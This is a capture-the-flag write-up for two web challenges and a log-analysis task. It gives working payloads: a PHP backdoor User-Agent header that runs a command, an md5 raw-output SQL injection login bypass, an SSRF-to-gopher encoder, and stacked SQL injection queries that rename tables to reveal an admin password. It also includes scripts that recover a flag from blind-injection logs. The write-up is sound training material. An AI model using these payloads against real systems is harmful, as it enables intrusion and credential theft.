Table of contents
- Web
- Sign-in
- "Take it slow" management system
- Misc
- Can you do log analysis
Web
Sign-in
http://cn-sec.com/archives/313267.html
User-Agentt: zerodiumsystem("cat /flag");
"Take it slow" management system
Per the challenge hint, the login in the first step should be attacked with a string that, after md5($string, true), turns into something like the following and so causes an injection:
```text
PS C:\Users\Administrator\Downloads> php -r "var_dump(md5('ffifdyop',true));"
Command line code:1:
string(16) "'or'6�]��!r,��b"
PS C:\Users\Administrator\Downloads>
```
Unfortunately, ffifdyop is filtered here, so we need another string that has the same effect as ffifdyop; a quick search turns one up:
```text
PS C:\Users\Administrator\Downloads> php -r "var_dump(md5('129581926211651571912466741651878684928',true));"
Command line code:1:
string(16) "�T0D��o#��'or'8"
PS C:\Users\Administrator\Downloads>
```
/?username=admin&password=129581926211651571912466741651878684928
Logged in successfully.
Following the challenge hint, look directly for admin.php on the internal network:
/ssrf.php?way=127.0.0.1%2Fadmin.php
Capture the request to this admin backend, rebuild the request to 127.0.0.1/admin.php, and send the POST data through the gopher protocol; a simple Python script does the encoding:
```python
from urllib.parse import quote

payload = "username=mochu7&password=mochu7"
# Raw HTTP request to replay against the internal admin.php (the leading
# blank line and the "\n" line endings were accepted by the target as-is)
postdata = """
POST /admin.php HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: {}

{}
""".format(len(payload), payload)
# Double URL-encode: once for the gopher payload itself, once more because
# the gopher URL travels inside the ?way= parameter and is decoded by the SSRF endpoint
final_payload = 'gopher://127.0.0.1:80/_' + quote(quote(postdata))
print(final_payload)
print(postdata)
```
gopher://127.0.0.1:80/_%250APOST%2520/admin.php%2520HTTP/1.1%250AHost%253A%2520127.0.0.1%250AContent-Type%253A%2520application/x-www-form-urlencoded%250AContent-Length%253A%252031%250A%250Ausername%253Dmochu7%2526password%253Dmochu7%250A
Sent successfully. Next, test for injection by adding a single quote:
username=mochu7'&password=mochu7
It errors straight away.
This is clearly an injection point, and later fuzzing confirmed that stacked queries work here; the echo also looked very familiar to me.
username=mochu7';show databases#&password=mochu7
gopher://127.0.0.1:80/_%250APOST%2520/admin.php%2520HTTP/1.1%250AHost%253A%2520127.0.0.1%250AContent-Type%253A%2520application/x-www-form-urlencoded%250AContent-Length%253A%252048%250A%250Ausername%253Dmochu7%2527%253Bshow%2520databases%2523%2526password%253Dmochu7%250A
Databases:
ctf
ctf2
information_schema
Keep going:
username=mochu7';use ctf;show tables#&password=mochu7
gopher://127.0.0.1:80/_%250APOST%2520/admin.php%2520HTTP/1.1%250AHost%253A%2520127.0.0.1%250AContent-Type%253A%2520application/x-www-form-urlencoded%250AContent-Length%253A%252053%250A%250Ausername%253Dmochu7%2527%253Buse%2520ctf%253Bshow%2520tables%2523%2526password%253Dmochu7%250A
username=mochu7';use ctf2;show tables#&password=mochu7
gopher://127.0.0.1:80/_%250APOST%2520/admin.php%2520HTTP/1.1%250AHost%253A%2520127.0.0.1%250AContent-Type%253A%2520application/x-www-form-urlencoded%250AContent-Length%253A%252054%250A%250Ausername%253Dmochu7%2527%253Buse%2520ctf2%253Bshow%2520tables%2523%2526password%253Dmochu7%250A
Tables_in_ctf:
users
Tables_in_ctf2:
fake_admin
real_admin_here_do_you_find
What we want is the real admin password:
username=mochu7';use ctf2;show columns from `fake_admin`#&password=mochu7
gopher://127.0.0.1:80/_%250APOST%2520/admin.php%2520HTTP/1.1%250AHost%253A%2520127.0.0.1%250AContent-Type%253A%2520application/x-www-form-urlencoded%250AContent-Length%253A%252073%250A%250Ausername%253Dmochu7%2527%253Buse%2520ctf2%253Bshow%2520columns%2520from%2520%2560fake_admin%2560%2523%2526password%253Dmochu7%250A
username=mochu7';use ctf2;show columns from `real_admin_here_do_you_find`#&password=mochu7
gopher://127.0.0.1:80/_%250APOST%2520/admin.php%2520HTTP/1.1%250AHost%253A%2520127.0.0.1%250AContent-Type%253A%2520application/x-www-form-urlencoded%250AContent-Length%253A%252090%250A%250Ausername%253Dmochu7%2527%253Buse%2520ctf2%253Bshow%2520columns%2520from%2520%2560real_admin_here_do_you_find%2560%2523%2526password%253Dmochu7%250A
Next we should query the column contents to get the password field from the real_admin_here_do_you_find table, but select, handler and the like are filtered here. During the competition I did not dig into how to read the column data, because this challenge clearly resembles an earlier Qiangwang Cup (强网杯) challenge, and I remembered that one was solved by renaming the table you want to query (real_admin_here_do_you_find) to the name of the table actually in use (fake_admin) and then constructing an injection that reads the current table's data:
username=mochu7';rename table fake_admin to mochu7;rename table real_admin_here_do_you_find to fake_admin#&password=mochu7
gopher://127.0.0.1:80/_%250APOST%2520/admin.php%2520HTTP/1.1%250AHost%253A%2520127.0.0.1%250AContent-Type%253A%2520application/x-www-form-urlencoded%250AContent-Length%253A%2520122%250A%250Ausername%253Dmochu7%2527%253Brename%2520table%2520fake_admin%2520to%2520mochu7%253Brename%2520table%2520real_admin_here_do_you_find%2520to%2520fake_admin%2523%2526password%253Dmochu7%250A
username=mochu7'or 1=1;show tables;#&password=mochu7
This yields the real admin password: 5fb4e07de914cfc82afb44vbaf402203
Finally, submit the real admin username and password:
username=admin&password=5fb4e07de914cfc82afb44vbaf402203
It tells us to visit /flag.php; check the page source and go there with the cookie.
Misc
Can you do log analysis
Log analysis of a time-based blind injection
Looking at the probe requests for each character position, one of them has a response length that differs from all the others; that request's guess should be the correct flag character at that position. A simple Python script pulls them out:
```python
from base64 import b64decode

flag = ''
with open('access.log', 'r') as f:
    lines = f.readlines()
for line in lines:
    # Only the blind-injection probes against the flllag table matter
    if "select%20flag%20from%20flllag" in line:
        # Response size sits between the status code and the "-" referer field
        packet_len = line[line.find(' 200 ') + 5:line.find(' "-" "python-requests/2.21.0"')]
        if packet_len == '377':
            # The probed ASCII value is the number between "))=" and ",sleep"
            ascii_code = line[line.find('))=') + 3:line.find(',sleep')]
            flag += chr(int(ascii_code))
# The extracted characters are base64-encoded
print(b64decode(flag).decode('utf-8'))
```
flag{You_are_so_great}
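The same idea, generalized: instead of hard-coding the outlier length 377, group the probes by character position and take the one guess whose response length deviates from the majority, which also flags positions where the log is ambiguous. This is an added example, not the writeup's own script; the exact log line format, the 374-byte baseline length and the sample flag are constructed assumptions.

```python
import re
from base64 import b64decode
from collections import Counter, defaultdict

# Probe shape seen in the challenge log (query text stays URL-encoded in the log):
# captures character position, guessed ASCII code and the HTTP response length
PROBE = re.compile(
    r'substr\(\(select%20flag%20from%20flllag\),(\d+),1\)\)=(\d+),sleep'
    r'.*?" 200 (\d+) ')

def recover_flag(lines):
    """Group probes by position; per position, the one guess whose response
    length differs from the majority is the branch where the condition held."""
    by_pos = defaultdict(list)          # pos -> [(ascii_code, resp_len), ...]
    for line in lines:
        m = PROBE.search(line)
        if m:
            pos, code, length = (int(x) for x in m.groups())
            by_pos[pos].append((code, length))
    out = []
    for pos in sorted(by_pos):
        common = Counter(l for _, l in by_pos[pos]).most_common(1)[0][0]
        hits = [c for c, l in by_pos[pos] if l != common]
        if len(hits) != 1:
            raise ValueError(f"position {pos}: expected one outlier, got {hits}")
        out.append(chr(hits[0]))
    return ''.join(out)

def make_sample_log(b64flag):
    """Constructed sample log: per position, wrong guesses answer with 374
    bytes (assumed) and the correct guess with 377 bytes (as in the writeup)."""
    tmpl = ('10.0.0.5 - - [10/Jan/2021:12:00:00 +0800] "GET /?id=1%27%20and%20if(ascii('
            'substr((select%20flag%20from%20flllag),{pos},1))={code},sleep(3),0)%23'
            ' HTTP/1.1" 200 {length} "-" "python-requests/2.21.0"')
    lines = []
    for pos, ch in enumerate(b64flag, start=1):
        for wrong in (48, 65, 97):      # '0', 'A', 'a'
            if wrong != ord(ch):
                lines.append(tmpl.format(pos=pos, code=wrong, length=374))
        lines.append(tmpl.format(pos=pos, code=ord(ch), length=377))
    return lines

def solve(lines):
    """Recovered characters are base64, as in the challenge; decode to the flag."""
    return b64decode(recover_flag(lines)).decode('utf-8')

if __name__ == '__main__':
    print(solve(make_sample_log('ZmxhZ3t0ZXN0fQ==')))  # flag{test}
```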